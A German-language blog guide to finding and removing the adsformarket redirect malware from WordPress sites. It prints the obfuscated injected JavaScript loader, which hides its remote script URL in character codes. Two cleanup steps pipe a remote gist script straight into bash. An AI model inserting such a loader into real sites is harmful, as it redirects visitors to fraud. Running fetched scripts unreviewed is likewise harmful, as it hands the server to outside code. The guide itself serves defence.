WordPress – Adsformarket Hack Umleitung bereinigen

Wordpress - Adsformarket Hack Umleitung bereinigen 1

Ein bösartiges JavaScript von adsformarket ist im Umlauf. Dadurch wird bösartiger Code in WordPress injiziert, der URL-Umleitungen zu betrügerischen Websites einrichtet. Nachstehend finden Sie einen Schritt-für-Schritt-Plan zur Bereinigung Ihrer WordPress Website!

Aber Achtung, nehmen Sie Änderungen an WordPress nur vor, wenn Sie genau wissen was Sie tun!

WordPress Adsformarket Virus bereinigen

Adsformarket Hack – Was ist das?

Wir verfolgen ständig Nachrichten über Sicherheitslücken und Hacks in WordPress. So erfuhren wir von Tausenden von WordPress-Websites, die mit einem bösartigem JavaScript infiziert sind, dass die Besucher Ihrer WordPress-Webseite auf andere Seiten umleitet (Adsformarket) In der vergangenen Woche hat die Zahl der Infektionen weiter zugenommen, wobei Hacker Schwachstellen in verschiedenen Plugins ausnutzen. Darunter: Simple Fields, InfiniteWP-Client, vermutlich der weit verbreitete PageBuilder von WPBakery und wahrscheinlich auch andere.

Adsformarket Hack identifizieren

Um zu überprüfen, ob Ihre WordPress-Installation mit adsformarket infiziert ist, können Sie den SiteCheck von Sucuri durchführen oder diesen Befehl über SSH ausführen: grep -liR ‘adsformarket’ $WP_PATH.

In den letzten Tagen haben verschiedene Internetseiten, die sich mit Cybersecurity auseinandersetzen über das Problem berichtet, darunter auch Sucuri. Die Umleitung, die durch die Malware eingerichtet wird führt auf eine Reihe von betrügerischen Domains, wie z.B. gotosecond2 [.] com, adsformarket [.] com, admarketlocation [.] com und admarket research [.] xyz.

Wie erfolgt die Infektion mit der adsformarket Malware?

Hacker können sich aufgrund von Schwachstellen in WordPress unerwünschten Zugang zu (Teilen) Ihrer Website verschaffen. Einmal drin, nutzen sie Schwachstelle aus, indem sie ein Stück Code injizieren. Damit rufen sie dann ein Skript auf, das eine Reihe von Umleitungen auf betrügerische Websites einrichtet. Dort werden die Besucher Ihrer Webseite dazu verleitet Umfragen auszufüllen um Geschenke zu erhalten. Besucher dieser Websites werden dazu verleitet, persönliche Informationen zu übertragen und / oder unbeabsichtigt Malware zu installieren.

Bösartige Skripte adformarket aus WordPress entfernen

Bisher gibt es keine automatische Möglichkeit die adsformarket Malware von einer infizierten Webseite zu entfernen. Patches für die betroffenen PlugIns sind aber bereits veröffentlicht worden. Die gängigen WordPress-SicherheitsplugIns wie Wordfence oder NinjaFirewall konnten den Angriff, zumindest bis vor wenigen Tagen, nicht erkennen oder verhindern.

Sie können versuchen, die adsformarket Malware manuell zu entfernen. Dazu haben wir eine Schritt-für-Schritt Anleitung für sie vorbereitet. Bitte denken sie aber daran, dass immer die Gefahr besteht, dass Ihre Webseite nicht mehr funktioniert. Legen sie daher unbedingt vorher ein Backup alle Dateien und der Datenbank an.

Schritt 1: Backup Ihrer WordPress Installation und via SSH einloggen

Die adsformarket Malware verhindert in den meisten Fällen bereits das einloggen in den Administrationsbereich von WordPress. Legen Sie daher bitte entweder ein manuelle Backup an indem Sie die Dateien via FTP und die Datenbank über phpmyadmin sichern.
War das Backup erfolgreich, loggen sie sich per SSH-Client auf Ihrem Webhosting-Paket ein und begeben sich in das Verzeichnis Ihrer WordPress-Installation.

cd publichtml/ihre_wordpress_installation/

Schritt 2: Infizierte Dateien finden

Der nächste und wichtigste Schritt ist die Identifikation der mit adsformarket infizierten Dateien Ihrer WordPress-Installation. Typischerweise injiziert die Malware folgende Codezeile in bestimmte Dateien Ihrer Installation:

<script type='text/javascript' src='https://snippet.adsformarket.same.js'>

Mit dem folgenden Befehl, den Sie über SSH ausführen müssen, finden Sie alle Dateien, die den Link zu “snippet.adsformarket.com” enthalten:

wget -O - https://gist.github.com/hiranthi/7f95166b7fa7bf2e1ac0f3f1ab7e1c30/raw/083115697c0fb1b1cc2ec9373344f669773bd402/cleanup-adsformarket.bash | bash

Da sehr viele Dateien betroffen sein können, wird die Ausgabe nicht über SSH erfolgen, stattdessen wird eine Textdatei oberhalb Ihrer WordPress-Installation namens adsformarket.txt angelegt, die alle betroffenen Dateien enthält.

Schritt 3: Bereinigung der infizierten Javascript-Dateien

In den infizierten Dateien wird meist ein Stück Code ähnlich dem folgenden Beispiel zu finden sein:

var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,
101,46,106,115,63,118,61,51); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {  
d.getElementsByTagName('head')[0].appendChild(s);
}

Die im ersten Teil des Codes zu findende Variable “gfjfgjk” kann auch bei Ihrer Installation anders sein. Bitte geben Sie die bei Ihnen gefundene Variable unbedingt in unseren Beispiel-Code ein. Der folgende Befehl löscht die ersten Bytes der betroffenen Dateien und macht den Code so nutzlos.

wget -O - https://gist.github.com/hiranthi/7f95166b7fa7bf2e1ac0f3f1ab7e1c30/raw/083115697c0fb1b1cc2ec9373344f669773bd402/cleanup-gfjfgjk.bash | bash

Eine Liste der geänderten Dateien wird als gfjfgjk.txt eine Ebene höher als Ihre WordPress-Installation abgelegt.

Schritt 4: Home- und Site-URL korrigieren

In vielen Fällen wird durch die Malware auch die Home- und Site-URL Ihrer WordPress- Installation geändert. Allerdings nicht in der wp-config.php sondern direkt in der Datenbank. Korrigieren Sie die URL via phpMyadmin. Sie finden den entsprechenden Eintrag in der Tabelle wp_options.

Schritt 5: Weitere Umleitungen finden und bereinigen

Suchen Sie innerhalb Ihrer WordPress-Installation nach weiteren Weiterleitungen der adsformarket Malware. Dies können Sie über SSH mit dem folgenden Befehl tun:

grep -liR 'adsformarket' $WP_PATH

Schritt 6: WordPress, PlugIns und Themes updaten

Nachdem Sie alle infizierten Dateien bereinigt haben, ist es wichtig WordPress und alle PlugIns und Themes auf den aktuellsten Stand zu bringen und eventuell noch vorhandene Sicherheitslücken zu schliessen.

Haben Sie dies erledigt, scannen Sie Ihre Webseite bitte noch einmal mit Wordfence oder Malcare auf eventuell verbliebene Reste der Malware.

Quellen: Wir danken dem niederländischen Hoster antagonist.nl herzlich für die Bereitstellung der angepassten Skripte zur Entfernung der adsformarket Malware.

1 Comment
Schreibe einen Kommentar